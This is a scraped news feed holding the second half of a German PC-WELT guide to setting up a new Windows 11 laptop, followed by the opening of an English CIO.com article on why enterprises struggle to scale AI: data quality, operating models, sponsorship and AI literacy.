<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf37dcaa"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Windows-11-Apps-deinstallieren.png?w=1200" alt="Windows 11 Apps deinstallieren" class="wp-image-2945550" width="1200" height="644" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Unnötige Programme sollten Sie gleich am Anfang deinstallieren. Das schafft Platz und beseitigt mögliche Systembremsen.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Hersteller lieben es, Notebooks mit Testversionen, Tools und Mini-Games zu überfrachten – als Nutzer hat man für diese „Bloatware“ oft weniger Begeisterung. Solche überflüssigen Programme fressen Speicher, starten gerne im Hintergrund und können Ihr schönes neues System ausbremsen. Deshalb gilt: Am besten gleich am Anfang ausmisten.</p>



<p><strong>So gehen Sie vor:</strong></p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen → Apps → Installierte Apps</strong>.</li>



<li>Sortieren Sie nach Installationsdatum oder Hersteller.</li>



<li>Deinstallieren Sie alles, was Sie nicht kennen oder brauchen (etwa „<a href="https://www.jdoqocy.com/click-1676582-13998108?sid=rss">McAfee Trial</a>“, „Candy Crush“, oder die „Booking.com-App“).</li>
</ol>



<p><strong>Tipp: </strong>Noch gründlicher klappt’s mit Tools wie <a href="https://www.pcwelt.de/article/1135390/revo-uninstaller.html" target="_blank" rel="noreferrer noopener">Revo Uninstaller</a>, das auch versteckte Reste in der Registry aufspüren kann. Profi-Tipps zur Tiefenreinigung <a href="https://www.pcwelt.de/article/1141000/windows-system-cleaner.html" target="_blank" rel="noreferrer noopener">finden Sie hier</a>. Weitere Tipps zur Beschleunigung von Windows <a href="https://www.pcwelt.de/article/1165056/so-bringen-sie-ihr-windows-schnell-auf-vordermann-fruehjahrsputz.html" target="_blank" rel="noreferrer noopener">erklären wir in diesem Beitrag</a>.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading">3. Wichtige Programme und Tools installieren</h2>



<p>Jetzt kommt der kreative Teil: Ihr Notebook bekommt seine persönliche Grundausstattung. Diese Software sollte auf keinem neuen Windows-11-Gerät fehlen:</p>



<ul class="wp-block-list">
<li><strong>Browser:</strong> <a href="https://www.google.com/intl/de_de/chrome/" target="_blank" rel="noreferrer noopener">Chrome</a>, <a href="https://www.firefox.com/de/" target="_blank" rel="noreferrer noopener">Firefox</a> oder <a href="https://brave.com/de/download/" target="_blank" rel="noreferrer noopener">Brave</a> – je nach Geschmack. Gamer greifen zu <a href="https://www.pcwelt.de/article/2831212/opera-gx-boostet-fps-beim-zocken-mit-cpu-und-ram-limitter.html" target="_blank" rel="noreferrer noopener">Opera GX</a>.</li>



<li><strong>Office-Suite:</strong> <a href="https://www.microsoft.com/de-de/microsoft-365?market=de" target="_blank" rel="noreferrer noopener">Microsoft 365</a>, <a href="https://de.libreoffice.org/" target="_blank" rel="noreferrer noopener">LibreOffice</a> oder <a href="https://workspace.google.com/intl/de/products/docs/" target="_blank" rel="noreferrer noopener">Google Docs</a>.</li>



<li><strong>PDF-Tool:</strong> <a href="https://get.adobe.com/de/reader/" target="_blank" rel="noreferrer noopener">Adobe Acrobat Reader</a>, <a href="https://www.sumatrapdfreader.org/download-free-pdf-viewer" target="_blank" rel="noreferrer noopener">SumatraPDF</a> oder <a href="https://www.pdf24.org/de/" target="_blank" rel="noreferrer noopener">PDF24</a>.</li>



<li><strong>Antivirus:</strong> Windows Defender ist solide, wer mehr Kontrolle will, installiert ein externes Tool. Hier finden Sie die <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">aktuell besten Antivirus-Programme</a>.</li>



<li><strong>Passwort-Manager:</strong> <a href="https://bitwarden.com/de-de/download/" target="_blank" rel="noreferrer noopener">Bitwarden</a>, <a href="https://www.kqzyfj.com/click-3275038-14510609?sid=rss&amp;url=https://1password.com/de/downloads/windows" target="_blank" rel="noreferrer noopener">1Password</a> oder <a href="https://keepassxc.org/download/" target="_blank" rel="noreferrer noopener">KeePassXC</a>. Mehr Auswahl gibt es hier: <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">die besten Passwort-Manager</a>.</li>



<li><strong>Cloud-Backup:</strong> <a href="https://www.microsoft.com/de-de/microsoft-365/onedrive/download?market=de" target="_blank" rel="noreferrer noopener">Onedrive</a>, <a href="https://www.dropbox.com/de/install" target="_blank" rel="noreferrer noopener">Dropbox</a> oder <a href="https://www.idrive.com/de/online-backup-download" target="_blank" rel="noreferrer noopener">iDrive</a>.</li>
</ul>



<p><strong>Tipp</strong>: Installieren Sie Ihre wichtigsten Programme gleich nach dem Update-Durchlauf. So haben Sie bei späteren Problemen einen klaren Systemstand, auf den Sie sich verlassen können. Mit <a href="https://ninite.com/" target="_blank" rel="noreferrer noopener">Ninite</a> können Sie übrigens mehrere Programme gleichzeitig installieren, ohne nervige Toolbars oder Zusatzsoftware.</p>



<h2 class="wp-block-heading">4. Wichtige Windows-Einstellungen für Laptops</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf37f3c3"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Windows-11-Datenschutz-Einstellungen.png?w=1200" alt="Windows 11 Datenschutz Einstellungen" class="wp-image-2945555" width="1200" height="644" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Ein paar kurze, aber wichtige Einstellungen zum Datenschutz sollten Sie bei Windows 11 unbedingt vornehmen.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Windows 11 bringt viele smarte Funktionen mit, die sind aber bei Weitem nicht alle optimal vorkonfiguriert. Ein paar Klicks in den Einstellungen machen den Alltag deutlich angenehmer (und sicherer):</p>



<ul class="wp-block-list">
<li><strong>Datenschutz:</strong> Unter <em>Einstellungen → Datenschutz und Sicherheit → Windows-Berechtigungen</em> können Sie überflüssige Telemetrie, Werbung und Standortzugriffe abschalten.</li>



<li><strong>Windows Defender:</strong> Prüfen Sie unter <em>Windows Sicherheit → Viren- und Bedrohungsschutz</em>, ob der Echtzeitschutz aktiv ist.</li>



<li><strong>Onedrive-Sync:</strong> Falls Sie lokale Ordner bevorzugen, deaktivieren oder begrenzen Sie den automatischen Upload.</li>



<li><strong>Standard-Apps:</strong> Wählen Sie Ihre bevorzugten Programme für Browser, Mail und Fotos – sonst öffnet Windows gerne ungefragt Edge &amp; Co. Die Einstellungen finden Sie unter „Standard-Apps“ (einfach ins Start-Fenster tippen). Über <em>Einstellungen → Apps → Standard-Apps</em> kommen Sie ebenfalls ans Ziel.</li>
</ul>



<p><strong>Tipp</strong>: Aktivieren Sie die Option <strong>„Dateiendungen anzeigen“</strong> im Datei-Explorer. Das erleichtert das Erkennen verdächtiger Dateien und ist ein einfacher Schutz gegen Phishing und Schad-Software. Klicken Sie dazu in der Menüleiste auf <em>Ansicht</em> und setzen Sie ein Häkchen bei “Dateinamenerweiterungen”.</p>



<h2 class="wp-block-heading">5. Touchpad, Tastatur und Funktionstasten konfigurieren</h2>



<p>Gerade bei Laptops ist das Feintuning der Eingabegeräte Gold wert. Ein zu empfindliches Touchpad oder eine unpraktische FN-Belegung können schnell nerven und Arbeitsprozesse bremsen – solche Probleme sind aber schnell behoben.</p>



<ul class="wp-block-list">
<li><strong>Touchpad-Gesten:</strong> Öffnen Sie <em>Einstellungen → Bluetooth und Geräte → Touchpad</em>. Hier können Sie Gesten für Scrollen, Zoomen und Desktop-Wechsel anpassen oder deaktivieren.</li>



<li><strong>Mausgeschwindigkeit:</strong> In denselben Einstellungen lässt sich die Zeigergeschwindigkeit anpassen („Cursergeschwindigkeit“).</li>



<li><strong>Funktionstasten:</strong> Viele Hersteller bieten Tools wie <em><a href="https://rog.asus.com/de/content/armoury-crate/" target="_blank" rel="noreferrer noopener">Asus Armoury Crate</a></em> oder <em><a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/document/ish_9869091-9958272-16" target="_blank" rel="noreferrer noopener">HP Command Center</a></em>, um FN-Tasten zu konfigurieren. Prüfen Sie dort, ob Helligkeit, Lautstärke und Lüftersteuerung korrekt reagieren.</li>
</ul>



<p><strong>Tipp</strong>: Nutzen Sie Drei-Finger-Gesten für Multitasking. Damit können Sie blitzschnell zwischen Apps wechseln oder zum Desktop springen. Das spart Zeit im Alltag und erlaubt entspannteres Arbeiten.</p>



<h2 class="wp-block-heading">6. Akku und Energieeinstellungen optimieren</h2>



<p>Ein frischer Akku hält am Anfang lange durch – mit den richtigen Einstellungen läuft das neue Notebook aber noch effizienter. Windows 11 bietet mehrere Möglichkeiten, um Laufzeit, Performance und Stromverbrauch fein abzustimmen.</p>



<p>So holen Sie das Maximum heraus:</p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <em>Einstellungen → System → Strom und Akku</em>.</li>



<li>Unter <strong>Energiestatus </strong>wählen Sie, was Ihnen wichtiger ist: <strong>Beste Energieeffizienz, Ausbalanciert </strong>oder <strong>Beste Leistung</strong>.</li>



<li>Sie können die Bildschirmhelligkeit im Akkubetrieb um ein paar Stufen reduzieren – das bringt oft 30 bis 60 Minuten mehr Laufzeit.</li>



<li>Aktivieren Sie den <strong>Energiesparmodus</strong>, wenn der Akkustand unter 30 Prozent fällt.</li>
</ol>



<p><strong>Tipp für Technikfans</strong>: Erstellen Sie mit dem Befehl „<em>powercfg /batteryreport“ </em>im Terminal (Win + X → Terminal (Admin)) <a href="https://www.pcwelt.de/article/1141612/akku-kapazitaet-unter-windows-ermitteln.html" target="_blank" rel="noreferrer noopener">einen detaillierten Akkubericht.</a> Der zeigt, wie oft Ihr Akku schon geladen wurde, welche Kapazität er noch hat und wann es Zeit für einen Austausch wird.</p>



<p>Um Ihren Akku dauerhaft zu schonen, empfehlen wir außerdem:</p>



<ul class="wp-block-list">
<li>Regelmäßige Zwischenladungen statt Dauerbetrieb am Netzteil.</li>



<li>Keine dauerhafte 100-Prozent-Ladung, das stresst die Energiezellen.</li>



<li>Bei längerer Nichtnutzung: Akku auf circa 50 Prozent laden und kühl lagern (aber nicht kalt).</li>
</ul>



<h2 class="wp-block-heading">7. Sicherheit und Datenschutz stärken</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf380700"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/11/geraeteverschlusselung-01.png" alt="Windows 11 Home kommt mit der Geräteverschlüsselung. Diese bringt aber nicht die Einstellungsmöglichkeiten, die Bitlocker nutzt." class="wp-image-2513445" width="1024" height="647" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Unsichtbarer Bodyguard: Bitlocker verschlüsselt bei Bedarf die gesamte Festplatte. So sind Dokumente, Fotos oder sensiblen Dateien robust gegen Fremdzugriffe geschützt.</figcaption></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sobald Ihr System läuft, sollten Sie den Sicherheitsgurt anlegen – sprich: die wichtigsten Schutzfunktionen aktivieren. Windows 11 bringt dafür schon alles mit, Sie müssen es nur einschalten oder prüfen.</p>



<p><strong>Empfohlene Schritte:</strong></p>



<ol start="1" class="wp-block-list">
<li><strong>Windows Hello aktivieren</strong> – unter <em>Einstellungen → Konten → Anmeldeoptionen</em> können Sie eine PIN, Fingerabdruck oder Gesichtserkennung einrichten.</li>



<li><strong>Bitlocker oder Geräteverschlüsselung</strong> aktivieren – so sind Ihre Daten auch bei Diebstahl geschützt.</li>



<li><strong>Firewall prüfen</strong> – die sollte immer aktiv sein.</li>



<li><strong>WLAN-Sicherheit</strong>: Alte Netzwerke löschen, öffentliche Hotspots meiden oder <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">per VPN absichern</a>.</li>
</ol>



<p><strong>Tipp</strong>: Wenn Sie Windows 11 Pro nutzen (<a href="https://software.pcwelt.de/offer/windows-11-professional-upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">das Upgrade auf die Pro-Version bekommen Sie hier für nur 59,99 Euro</a>), sollten Sie <strong>Bitlocker</strong> aktivieren. Das verschlüsselt die komplette Festplatte und lässt sich mit Ihrem Microsoft-Konto koppeln. Bei Geräten mit TPM 2.0 (Standard seit 2021) funktioniert das ganz automatisch. Wenn Sie maximale Kontrolle über Ihre Privatsphäre haben wollen: Tools wie <a href="https://www.oo-software.com/de/shutup10" target="_blank" rel="noreferrer noopener">O&amp;O ShutUp10++</a> helfen, versteckte Telemetrie-Dienste mit einem Klick zu deaktivieren.</p>



<h2 class="wp-block-heading">8. Backup und Wiederherstellung einrichten</h2>



<p>Nichts ist ärgerlicher, als ein perfekt eingerichtetes System zu verlieren, weil ein Update dazwischenfunkt oder ein Virus zuschlägt. Darum unsere Empfehlung: gleich zu Beginn ein <strong>Gesamtbackup</strong> anlegen.</p>



<p><strong>So geht’s:</strong></p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <em>Systemsteuerung → System und Sicherheit → Sichern und Wiederherstellen (Windows 7).</em> Lassen Sie sich dabei nicht vom Begriff „Windows 7“ irritieren, das ist nur eine alte Bezeichnung, an der Microsoft festhält.</li>



<li>Wählen Sie <strong>„Systemabbild erstellen“</strong> und speichern Sie es auf einer externen Festplatte.</li>



<li>Danach am besten gleich einen <strong>Wiederherstellungspunkt</strong> setzen. Tippen Sie dafür einfach „Wiederherstellungspunkt erstellen“ in die Suche.</li>
</ol>



<p><strong>Tipp</strong>: Alternativ können Sie auch Cloud-Dienste wie Onedrive oder Google Drive nutzen, um persönliche Dateien automatisch zu sichern. Wer es bequem mag und bereit ist, etwas Geld auszugeben, greift zu Tools wie <a href="https://www.macrium.com/reflectfree" target="_blank" rel="noreferrer noopener">Macrium Reflect</a> oder <a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/">Acronis Tru</a><a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/" target="_blank" rel="noreferrer noopener">e</a><a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/"> Image</a>. Damit erstellen Sie komplette Abbilder und planen regelmäßige Backups automatisch.</p>



<h2 class="wp-block-heading">9. Performance-Tuning und Komfortfunktionen</h2>



<p>Ein paar schnelle Handgriffe machen Windows nicht nur schneller, sondern auch komfortabler.<br>Hier sind die besten Sofortmaßnahmen:</p>



<ul class="wp-block-list">
<li><strong>Autostart-Programme reduzieren:</strong> Im Task-Manager (Strg + Shift + Esc → „Autostart“) deaktivieren Sie alles, was Sie nicht ständig benötigen.</li>



<li><strong>Speicheroptimierung aktivieren:</strong> <em>Einstellungen → System → Speicher</em> → „Speicheroptimierung“ einschalten. Windows löscht dann automatisch temporäre Dateien.</li>



<li><strong>Visuelle Effekte anpassen:</strong> „Erweiterte Systemeinstellungen“ in die Suche eingeben und über <em>Erweitert → Leistung → Einstellungen</em> die Funktion „Für optimale Leistung anpassen“ auswählen.</li>



<li><strong>Snap-Layouts und virtuelle Desktops</strong> nutzen: Mit <strong>Win + Z</strong> Fenster flexibel anordnen und mit <strong>Win + Tab</strong> zwischen Arbeitsflächen wechseln.</li>
</ul>



<p><strong>Tipp</strong>: Für Power-User lohnt sich ein Blick auf <a href="https://www.pcwelt.de/article/2493169/nuetzliche-microsoft-powertoys-funktionen.html" target="_blank" rel="noreferrer noopener">Powertoys</a>. Das kostenlose Microsoft-Tool liefert Zusatzfunktionen wie Fenster-Snap, Tastenkürzel oder Farbpipette.</p>



<h2 class="wp-block-heading">10. Bonus: Extras für Fortgeschrittene</h2>



<p>Wenn Sie es ganz genau nehmen wollen, können Sie jetzt noch ein paar Feineinstellungen vornehmen, die oft nur erfahrene Nutzer kennen:</p>



<ul class="wp-block-list">
<li><strong>BIOS/UEFI prüfen:</strong> Mit <em>Entf</em> oder <em>F2</em> beim Start aufrufen. Dort können Sie Secure Boot, Bootreihenfolge oder Lüfterprofile anpassen.</li>



<li><strong>Hersteller-Tools checken:</strong> Programme wie <a href="https://www.asus.com/de/support/myasus-deeplink/" target="_blank" rel="noreferrer noopener">My Asus</a>, <a href="https://lenovo.7eer.net/c/230135/217393/3786?u=https://support.lenovo.com/de/de/solutions/ht505081&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Lenovo Vantage</a> oder <a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/help/hp-support-assistant" target="_blank" rel="noreferrer noopener">HP Support Assistant</a> liefern Firmware-Updates – entscheiden Sie selbst, welche Sie nutzen oder behalten möchten.</li>



<li><strong>Gaming-Optimierung:</strong> Bei Notebooks mit dedizierter GPU lohnt es sich, die Energieprofile in der Grafikkartensteuerung zu prüfen.</li>



<li><strong>Windows-Features deaktivieren:</strong> <em>Systemsteuerung → Programme <em>→ Programme</em></em> <em>und Features → Windows-Features aktivieren oder deaktivieren</em> – hier lassen sich unnötige Dienste wie „Internet Explorer 11“ oder „XPS-Dienste“ abschalten.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Traumstart für Ihr neues Notebook</h2>



<p>Ein neues Notebook ist wie ein leeres Notizbuch. Es lohnt sich, die ersten Seiten ordentlich zu gestalten. Mit diesen zehn Schritten sichern Sie sich Leistung, Datenschutz und Komfort von Anfang an. Nach der kurzen Einrichtung läuft Ihr Windows 11 dann so stabil, schnell und individuell, wie es sollte. Mit weniger Ballast und Neugier – dafür mit mehr Komfort und Sicherheit.</p>



<p><strong>Extra-Tipp: </strong>Wenn Sie noch mehr aus Ihrem System herausholen wollen, lesen Sie auch: <a href="https://www.pcwelt.de/article/1807849/tipps-windows-pc-schneller.html" target="_blank" rel="noreferrer noopener">kostenlose Tipps, damit Ihr Windows-PC schneller läuft</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs must rethink operating models to unlock AI at scale]]></title>
<description><![CDATA[Almost every company has a board or executive AI mandate. Vendors are rolling out agentic AI platforms. The pressure to move is intense.



But the reality on the ground looks different. Eighty-three percent of organizations say data quality is their top AI challenge, and 74% struggle to demonstr...]]></description>
<link>https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</guid>
<pubDate>Mon, 13 Jul 2026 12:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Almost every company has a <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">board or executive AI mandate</a>. Vendors are rolling out agentic AI platforms. The pressure to move is intense.</p>



<p>But the reality on the ground looks different. Eighty-three percent of organizations say <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">data quality is their top AI challenge</a>, and 74% struggle to demonstrate ROI, according to Lopez Research. And only 21% report having a mature <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">governance model for AI agents</a>, per Deloitte’s <a href="https://www.deloitte.com/us/en/about/press-room/state-of-ai-report-2026.html" rel="nofollow">2026 State of Enterprise AI</a> report.</p>



<p>“Agentic AI is real, and vendors’ offerings are very real, too,” says <a href="https://www.forrester.com/analyst-bio/boris-evelson/BIO1737" rel="nofollow">Boris Evelson</a>, vice president and principal analyst at Forrester. “However, most enterprises are still not ready to adopt at scale.”</p>



<p><a href="https://www.westmonroe.com/our-team/david-hilborn" rel="nofollow">Dave Hilborn</a>, who leads West Monroe’s Organization, People &amp; Change practice, frames it as a race with three arrows moving forward — one representing AI and tech evolution, one representing organizations and people, and one representing data. “The AI arrow is far out ahead,” he says. “That delta is the readiness gap.”</p>



<p>The gap <a href="https://www.cio.com/article/4192383/its-not-the-it-holding-ai-back-its-the-business-processes.html">isn’t the technology</a>. It’s the foundational work most organizations haven’t done: data readiness, operating models, governance, skills, and culture. The companies making progress aren’t waiting for vendors to solve these problems. They’re tackling the unglamorous work themselves.</p>



<h2 class="wp-block-heading">AI doesn’t tolerate ambiguity</h2>



<p>AI readiness can be framed across six levels — from data foundation at the base to <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">reinvented business experiences</a> at the top, says <a href="https://www.linkedin.com/in/afsheantalasaz/" rel="nofollow">Afshean Talasaz</a>, former CIO at Colonial Pipeline and now an executive advisor. One of the key areas that doesn’t always get the attention it needs is the operating model.<strong></strong></p>



<p>“The technology playbooks of the past don’t work in the AI world,” Talasaz says. “Those areas were able to tolerate more ambiguity between business and tech teams. AI doesn’t tolerate the same level of ambiguity. It needs clarity.”</p>



<p>That demands a different kind of partnership between IT and the business. AI systems learn from data — records and measurements of what’s actually happening in the business — and then operate within business processes. Unlike traditional software, which is built based on user requirements, AI is sandwiched between the business that produces the data and the business that consumes the outputs.</p>



<p>“AI is requiring IT and business teams to work more closely together, to be clearer about what AI will and will not do — that really close partnership is crucial,” Talasaz says. “It’s not something that will always naturally evolve. It requires a lot of intentionality about how teams need to work together to deliver outcomes.”</p>



<p>The <a href="https://www.cio.com/article/3801027/10-ai-strategy-questions-every-cio-must-answer.html">AI questions CIOs must answer</a> aren’t just technical. Do we have the right operating model? Have we balanced governance and standard operating procedures within the model? Have we organized teams appropriately? All this must be designed within the context of what the business actually needs.</p>



<p>Too many organizations are <a href="https://www.cio.com/article/4159287/most-companies-are-stuck-on-ai-chat.html">bolting AI onto existing processes</a> without redefining roles or workflows, Forrester’s Evelson. “Organizations can either incrementally enhance existing workflows by augmenting capabilities with AI or pursue a more transformative approach by redesigning the process end-to-end.”</p>



<p>The companies getting value are doing the latter.</p>



<h2 class="wp-block-heading">Data debt comes due</h2>



<p>Data readiness remains the most common barrier to scaling AI. “We’ve never fixed this data quality problem in most organizations,” says <a href="https://www.lopezresearch.com/" rel="nofollow">Maribel Lopez</a>, founder and principal analyst at Lopez Research, “and it comes back to haunt a company in spades as they move to AI.”</p>



<p>At Levi Strauss, the foundational work came first. “If you think about the Levi’s business, it’s quite complex — 100 countries, over 3,000 stores, multiple business models,” says <a href="https://www.levistrauss.com/who-we-are/leadership/jason-gowans/" rel="nofollow">Jason Gowans</a>, the company’s chief digital and technology officer. “You can imagine the complexity of gathering all that data to understand how the business is performing. The idea of this single source of truth — that’s been the biggest thing.”</p>



<p>Levi’s now has more than 1,100 standard operating procedures that govern how work gets done on top of SAP. “That’s fertile material to feed to LLMs on how work gets done,” Gowans says.The results are tangible: partner onboarding that once took three to six months to set up EDI exchanges now takes days.</p>



<p>At contract manufacturing company Jabil, <a href="https://www.linkedin.com/in/chase-christensen-b0447/" rel="nofollow">Chase Christensen</a>, segment CIO, took a similar path. “We had to get everyone to understand where the source data resides, put tech in place so consumption is easier, and drive ownership around data and decision rights — so 140,000 employees don’t feel empowered to create their own data sources that fall out of line.”</p>



<p>The data challenge goes beyond quality, Evelson notes. <a href="https://www.cio.com/article/4104444/8-tips-for-rebuilding-an-ai-ready-data-strategy.html">Most organizations’ data isn’t AI-ready</a>; it hasn’t been prepared for how AI systems consume and learn from information. “Data is siloed, poorly governed, and hard to discover, integrate, and trust,” he says.</p>



<p>Forrester research shows that 45% of data and analytics decision-makers were adopting vector databases in 2025, and 53% were adopting graph databases — investments that signal recognition of how much data architecture needs to evolve. The firm recommends a balanced approach: roughly 48% of AI spending on foundations such as data management and engineering, and 52% on consumption, including analytics, governance, and applications.</p>



<p>But even as organizations work to prepare existing data, AI is creating new challenges. Users leveraging AI tools are generating new forms of data and information that never make it into corporate databases, West Monroe’s Hilborn notes.</p>



<p>“There are explosions of new data, content, and insights being created on the periphery of these data lakes,” he says. “The challenge is how do you capture that and leverage it.”</p>



<h2 class="wp-block-heading">Who’s sponsoring this?</h2>



<p>Even when data is in order, many AI initiatives stall due to how they’re sponsored and funded.</p>



<p>“Enterprise data, analytics, and AI programs succeed when business CxOs sponsor them because they are accountable for business outcomes, not just technology delivery,” Forrester’s Evelson says. “IT-led initiatives often become siloed or tool-centric, whereas business sponsorship ensures alignment to enterprise strategy, prioritization of end-to-end use cases, and a focus on decisions and actions rather than insights alone.”</p>



<p>Too often, AI is still treated as a series of disconnected use cases rather than a sustained, multi-year investment. Evelson calls this the “use case trap” — organizations overindex on individual projects and miss the enterprise-wide compounding impact. That leads to fragmented priorities, inconsistent adoption, and difficulty demonstrating ROI.</p>



<p>Leadership readiness is a distinct layer of AI preparedness, Talasaz says. “Are leaders prepared to provide a vision of reinvented business experiences that become the north star?” he asks. “Leadership teams, at various levels of the organization, need to articulate what a reinvented business looks like so teams have the direction and support to build differentiating capabilities.”</p>



<p>Levi’s offers a counterexample. AI is a CEO priority there. At the last quarterly offsite, the execs were building agents. “When you’re committed to upskilling the workforce, you’re better served to answer how to rewire processes with AI at the core,” Gowans says. “It starts at the top. It has to be an exec priority.”</p>



<h2 class="wp-block-heading">Fear, literacy, and two types of AI</h2>



<p>Technical talent is only part of the equation. Organizations also need to <a href="https://www.cio.com/article/4016354/cios-tackle-the-ai-change-management-challenge.html">address change management</a>.</p>



<p>“We saw it with the AI boom — fear about jobs, not knowing what AI did,” says Jabil’s Christensen. “The key is demystifying AI. We doubled down and focused on AI literacy. We want everyone to understand how it was put together, and that removed a lot of that fear. That’s been the biggest hurdle.”</p>



